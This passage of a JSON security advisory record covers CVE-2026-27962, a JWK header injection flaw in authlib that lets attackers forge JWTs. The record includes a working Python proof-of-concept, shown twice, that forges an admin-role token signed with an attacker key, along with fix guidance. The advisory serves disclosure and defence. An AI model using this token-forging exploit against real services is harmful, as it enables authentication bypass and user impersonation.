                    "text": "## Description\n\n### Summary\n\nA JWK Header Injection vulnerability in `authlib`'s JWS implementation allows an unauthenticated\nattacker to forge arbitrary JWT tokens that pass signature verification. When `key=None` is passed\nto any JWS deserialization function, the library extracts and uses the cryptographic key embedded\nin the attacker-controlled JWT `jwk` header field. An attacker can sign a token with their own\nprivate key, embed the matching public key in the header, and have the server accept the forged\ntoken as cryptographically valid — bypassing authentication and authorization entirely.\n\nThis behavior violates **RFC 7515 §4.1.3** and the validation algorithm defined in **RFC 7515 §5.2**.\n\n### Details\n\n**Vulnerable file:** `authlib/jose/rfc7515/jws.py`  \n**Vulnerable method:** `JsonWebSignature._prepare_algorithm_key()`  \n**Lines:** 272–273\n\n```python\nelif key is None and \"jwk\" in header:\n    key = header[\"jwk\"]   # ← attacker-controlled key used for verification\n```\n\nWhen `key=None` is passed to `jws.deserialize_compact()`, `jws.deserialize_json()`, or\n`jws.deserialize()`, the library checks the JWT header for a `jwk` field. If present, it extracts\nthat value — which is fully attacker-controlled — and uses it as the verification key.\n\n**RFC 7515 violations:**\n\n- **§4.1.3** explicitly states the `jwk` header parameter is **\"NOT RECOMMENDED\"** because keys\n  embedded by the token submitter cannot be trusted as a verification anchor.\n- **§5.2 (Validation Algorithm)** specifies the verification key MUST come from the *application\n  context*, not from the token itself. 
There is no step in the RFC that permits falling back to\n  the `jwk` header when no application key is provided.\n\n**Why this is a library issue, not just a developer mistake:**\n\nThe most common real-world trigger is a **key resolver callable** used for JWKS-based key lookup.\nA developer writes:\n\n```python\ndef lookup_key(header, payload):\n    kid = header.get(\"kid\")\n    return jwks_cache.get(kid)   # returns None when kid is unknown/rotated\n\njws.deserialize_compact(token, lookup_key)\n```\n\nWhen an attacker submits a token with an unknown `kid`, the callable legitimately returns `None`.\nThe library then silently falls through to `key = header[\"jwk\"]`, trusting the attacker's embedded\nkey. The developer never wrote `key=None` — the library's fallback logic introduced it. The result\nlooks like a verified token with no exception raised, making the substitution invisible.\n\n**Attack steps:**\n\n1. Attacker generates an RSA or EC keypair.\n2. Attacker crafts a JWT payload with any desired claims (e.g. `{\"role\": \"admin\"}`).\n3. Attacker signs the JWT with their **private** key.\n4. Attacker embeds their **public** key in the JWT `jwk` header field.\n5. Attacker uses an unknown `kid` to cause the key resolver to return `None`.\n6. The library uses `header[\"jwk\"]` for verification — signature passes.\n7. 
Forged claims are returned as authentic.\n\n### PoC\n\nTested against **authlib 1.6.6** (HEAD `a9e4cfee`, Python 3.11).\n\n**Requirements:**\n```\npip install authlib cryptography\n```\n\n**Exploit script:**\n```python\nfrom authlib.jose import JsonWebSignature, RSAKey\nimport json\n\njws = JsonWebSignature([\"RS256\"])\n\n# Step 1: Attacker generates their own RSA keypair\nattacker_private = RSAKey.generate_key(2048, is_private=True)\nattacker_public_jwk = attacker_private.as_dict(is_private=False)\n\n# Step 2: Forge a JWT with elevated privileges, embed public key in header\nheader = {\"alg\": \"RS256\", \"jwk\": attacker_public_jwk}\nforged_payload = json.dumps({\"sub\": \"attacker\", \"role\": \"admin\"}).encode()\nforged_token = jws.serialize_compact(header, forged_payload, attacker_private)\n\n# Step 3: Server decodes with key=None — token is accepted\nresult = jws.deserialize_compact(forged_token, None)\nclaims = json.loads(result[\"payload\"])\nprint(claims)  # {'sub': 'attacker', 'role': 'admin'}\nassert claims[\"role\"] == \"admin\"  # PASSES\n```\n\n**Expected output:**\n```\n{'sub': 'attacker', 'role': 'admin'}\n```\n\n**Docker (self-contained reproduction):**\n```bash\nsudo docker run --rm authlib-cve-poc:latest \\\n  python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py\n```\n\n### Impact\n\nThis is an authentication and authorization bypass vulnerability. Any application using authlib's\nJWS deserialization is affected when:\n\n- `key=None` is passed directly, **or**\n- a key resolver callable returns `None` for unknown/rotated `kid` values (the common JWKS lookup pattern)\n\nAn unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims\n(admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys.\nThe forged token is indistinguishable from a legitimate one — no exception is raised.\n\nThis is a violation of **RFC 7515 §4.1.3** and **§5.2**. 
The spec is unambiguous: the `jwk`\nheader parameter is \"NOT RECOMMENDED\" as a key source, and the validation key MUST come from\nthe application context, not the token itself.\n\n**Minimal fix** — remove the fallback from `authlib/jose/rfc7515/jws.py:272-273`:\n```python\n# DELETE:\nelif key is None and \"jwk\" in header:\n    key = header[\"jwk\"]\n```\n\n**Recommended safe replacement** — raise explicitly when no key is resolved:\n```python\nif key is None:\n    raise MissingKeyError(\"No key provided and no valid key resolvable from context.\")\n```",
                    "title": "github - https://github.com/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "description",
                    "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
                },
                {
                    "category": "description",
                    "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-27962"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.\nThis IMPORTANT vulnerability in Authlib's JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Red Hat products including Ansible Automation Platform, Quay, and OpenShift AI are affected when configured to use key=None during JWS deserialization. The impact on confidentiality and integrity is high, as attackers can bypass authentication and authorization.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-27962"
                },
                {
                    "category": "description",
                    "text": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.",
                    "title": "debian - https://security-tracker.debian.org/tracker/CVE-2026-27962"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.",
                    "title": "redhat - https://access.redhat.com/errata/RHSA-2026:4942"
                },
                {
                    "category": "description",
                    "text": "## Description\n\n### Summary\n\nA JWK Header Injection vulnerability in `authlib`'s JWS implementation allows an unauthenticated\nattacker to forge arbitrary JWT tokens that pass signature verification. When `key=None` is passed\nto any JWS deserialization function, the library extracts and uses the cryptographic key embedded\nin the attacker-controlled JWT `jwk` header field. An attacker can sign a token with their own\nprivate key, embed the matching public key in the header, and have the server accept the forged\ntoken as cryptographically valid — bypassing authentication and authorization entirely.\n\nThis behavior violates **RFC 7515 §4.1.3** and the validation algorithm defined in **RFC 7515 §5.2**.\n\n### Details\n\n**Vulnerable file:** `authlib/jose/rfc7515/jws.py`  \n**Vulnerable method:** `JsonWebSignature._prepare_algorithm_key()`  \n**Lines:** 272–273\n\n```python\nelif key is None and \"jwk\" in header:\n    key = header[\"jwk\"]   # ← attacker-controlled key used for verification\n```\n\nWhen `key=None` is passed to `jws.deserialize_compact()`, `jws.deserialize_json()`, or\n`jws.deserialize()`, the library checks the JWT header for a `jwk` field. If present, it extracts\nthat value — which is fully attacker-controlled — and uses it as the verification key.\n\n**RFC 7515 violations:**\n\n- **§4.1.3** explicitly states the `jwk` header parameter is **\"NOT RECOMMENDED\"** because keys\n  embedded by the token submitter cannot be trusted as a verification anchor.\n- **§5.2 (Validation Algorithm)** specifies the verification key MUST come from the *application\n  context*, not from the token itself. 
There is no step in the RFC that permits falling back to\n  the `jwk` header when no application key is provided.\n\n**Why this is a library issue, not just a developer mistake:**\n\nThe most common real-world trigger is a **key resolver callable** used for JWKS-based key lookup.\nA developer writes:\n\n```python\ndef lookup_key(header, payload):\n    kid = header.get(\"kid\")\n    return jwks_cache.get(kid)   # returns None when kid is unknown/rotated\n\njws.deserialize_compact(token, lookup_key)\n```\n\nWhen an attacker submits a token with an unknown `kid`, the callable legitimately returns `None`.\nThe library then silently falls through to `key = header[\"jwk\"]`, trusting the attacker's embedded\nkey. The developer never wrote `key=None` — the library's fallback logic introduced it. The result\nlooks like a verified token with no exception raised, making the substitution invisible.\n\n**Attack steps:**\n\n1. Attacker generates an RSA or EC keypair.\n2. Attacker crafts a JWT payload with any desired claims (e.g. `{\"role\": \"admin\"}`).\n3. Attacker signs the JWT with their **private** key.\n4. Attacker embeds their **public** key in the JWT `jwk` header field.\n5. Attacker uses an unknown `kid` to cause the key resolver to return `None`.\n6. The library uses `header[\"jwk\"]` for verification — signature passes.\n7. 
Forged claims are returned as authentic.\n\n### PoC\n\nTested against **authlib 1.6.6** (HEAD `a9e4cfee`, Python 3.11).\n\n**Requirements:**\n```\npip install authlib cryptography\n```\n\n**Exploit script:**\n```python\nfrom authlib.jose import JsonWebSignature, RSAKey\nimport json\n\njws = JsonWebSignature([\"RS256\"])\n\n# Step 1: Attacker generates their own RSA keypair\nattacker_private = RSAKey.generate_key(2048, is_private=True)\nattacker_public_jwk = attacker_private.as_dict(is_private=False)\n\n# Step 2: Forge a JWT with elevated privileges, embed public key in header\nheader = {\"alg\": \"RS256\", \"jwk\": attacker_public_jwk}\nforged_payload = json.dumps({\"sub\": \"attacker\", \"role\": \"admin\"}).encode()\nforged_token = jws.serialize_compact(header, forged_payload, attacker_private)\n\n# Step 3: Server decodes with key=None — token is accepted\nresult = jws.deserialize_compact(forged_token, None)\nclaims = json.loads(result[\"payload\"])\nprint(claims)  # {'sub': 'attacker', 'role': 'admin'}\nassert claims[\"role\"] == \"admin\"  # PASSES\n```\n\n**Expected output:**\n```\n{'sub': 'attacker', 'role': 'admin'}\n```\n\n**Docker (self-contained reproduction):**\n```bash\nsudo docker run --rm authlib-cve-poc:latest \\\n  python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py\n```\n\n### Impact\n\nThis is an authentication and authorization bypass vulnerability. Any application using authlib's\nJWS deserialization is affected when:\n\n- `key=None` is passed directly, **or**\n- a key resolver callable returns `None` for unknown/rotated `kid` values (the common JWKS lookup pattern)\n\nAn unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims\n(admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys.\nThe forged token is indistinguishable from a legitimate one — no exception is raised.\n\nThis is a violation of **RFC 7515 §4.1.3** and **§5.2**. 
The spec is unambiguous: the `jwk`\nheader parameter is \"NOT RECOMMENDED\" as a key source, and the validation key MUST come from\nthe application context, not the token itself.\n\n**Minimal fix** — remove the fallback from `authlib/jose/rfc7515/jws.py:272-273`:\n```python\n# DELETE:\nelif key is None and \"jwk\" in header:\n    key = header[\"jwk\"]\n```\n\n**Recommended safe replacement** — raise explicitly when no key is resolved:\n```python\nif key is None:\n    raise MissingKeyError(\"No key provided and no valid key resolvable from context.\")\n```",
                    "title": "github - https://api.github.com/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker's key, allowing them to bypass authentication and gain unauthorized access.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5665.json"
                },
                {
                    "category": "other",
                    "text": "0.00064",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.8",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "VENDOR FIX as product remediation category, Is related to CWE-347 (Improper Verification of Cryptographic Signature)",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is product_remediation data available from source Redhat, The value of the most recent EPSS score, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "fixed": [
                    "CSAFPID-5846430",
                    "CSAFPID-5903532"
                ],
                "known_affected": [
                    "CSAFPID-5830119",
                    "CSAFPID-1439279",
                    "CSAFPID-1439313",
                    "CSAFPID-1441200",
                    "CSAFPID-1455906",
                    "CSAFPID-1508257",
                    "CSAFPID-2831634",
                    "CSAFPID-5035448",
                    "CSAFPID-5068100",
                    "CSAFPID-5068103",
                    "CSAFPID-5068105",
                    "CSAFPID-5068108",
                    "CSAFPID-5068110",
                    "CSAFPID-5068114",
                    "CSAFPID-5068116",
                    "CSAFPID-5068119",
                    "CSAFPID-5068121",
                    "CSAFPID-5068123",
                    "CSAFPID-5068126",
                    "CSAFPID-5068128",
                    "CSAFPID-5068131",
                    "CSAFPID-5068134",
                    "CSAFPID-5155537",
                    "CSAFPID-5155538",
                    "CSAFPID-5222639",
                    "CSAFPID-5222767",
                    "CSAFPID-5222780",
                    "CSAFPID-5355695",
                    "CSAFPID-5811359",
                    "CSAFPID-1405217",
                    "CSAFPID-1405218"
                ],
                "known_not_affected": [
                    "CSAFPID-5474797",
                    "CSAFPID-5474798",
                    "CSAFPID-5846431",
                    "CSAFPID-5846432",
                    "CSAFPID-5846433",
                    "CSAFPID-5846434",
                    "CSAFPID-5846435",
                    "CSAFPID-5846436",
                    "CSAFPID-5846437",
                    "CSAFPID-5846438",
                    "CSAFPID-5846439",
                    "CSAFPID-5903533",
                    "CSAFPID-5903534",
                    "CSAFPID-5903535",
                    "CSAFPID-5903536",
                    "CSAFPID-5903537",
                    "CSAFPID-5903538",
                    "CSAFPID-5903539",
                    "CSAFPID-5903540",
                    "CSAFPID-5903541"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/27xxx/CVE-2026-27962.json"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-27962.json"
                },
                {
                    "category": "external",
                    "summary": "Source - debian",
                    "url": "https://security-tracker.debian.org/tracker/CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:4942"
                },
                {
                    "category": "external",
                    "summary": "Source raw - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:4942.json"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - redhat",
                    "url": "https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5665.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; redhat",
                    "url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-wvwj-cvrp-7pv5"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; redhat",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27962"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:4942"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61726"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61728"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-61729"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2025-68121"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-24049"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25639"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-25990"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-26996"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27628"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27904"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-28802"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/updates/classification/"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_4942.json"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/errata/RHSA-2026:5665"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-26007"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://access.redhat.com/security/cve/CVE-2026-27606"
                },
                {
                    "category": "external",
                    "summary": "Reference - redhat",
                    "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5665.json"
                }
            ],
            "remediations": [
                {
                    "category": "vendor_fix",
                    "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
                    "product_ids": [
                        "CSAFPID-5256659",
                        "CSAFPID-5846430"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:4942"
                },
                {
                    "category": "vendor_fix",
                    "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
                    "product_ids": [
                        "CSAFPID-5209636",
                        "CSAFPID-5903532"
                    ],
                    "restart_required": {
                        "category": "none"
                    },
                    "url": "https://access.redhat.com/errata/RHSA-2026:5665"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                        "baseScore": 9.1,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-1405217",
                        "CSAFPID-1405218",
                        "CSAFPID-1439279",
                        "CSAFPID-1439313",
                        "CSAFPID-1441200",
                        "CSAFPID-1455906",
                        "CSAFPID-1508257",
                        "CSAFPID-2831634",
                        "CSAFPID-5035448",
                        "CSAFPID-5068100",
                        "CSAFPID-5068103",
                        "CSAFPID-5068105",
                        "CSAFPID-5068108",
                        "CSAFPID-5068110",
                        "CSAFPID-5068114",
                        "CSAFPID-5068116",
                        "CSAFPID-5068119",
                        "CSAFPID-5068121",
                        "CSAFPID-5068123",
                        "CSAFPID-5068126",
                        "CSAFPID-5068128",
                        "CSAFPID-5068131",
                        "CSAFPID-5068134",
                        "CSAFPID-5155537",
                        "CSAFPID-5155538",
                        "CSAFPID-5222639",
                        "CSAFPID-5222767",
                        "CSAFPID-5222780",
                        "CSAFPID-5355695",
                        "CSAFPID-5811359",
                        "CSAFPID-5830119"
                    ]
                }
            ],
            "title": "CVE-2026-27962"
        }
    ]
}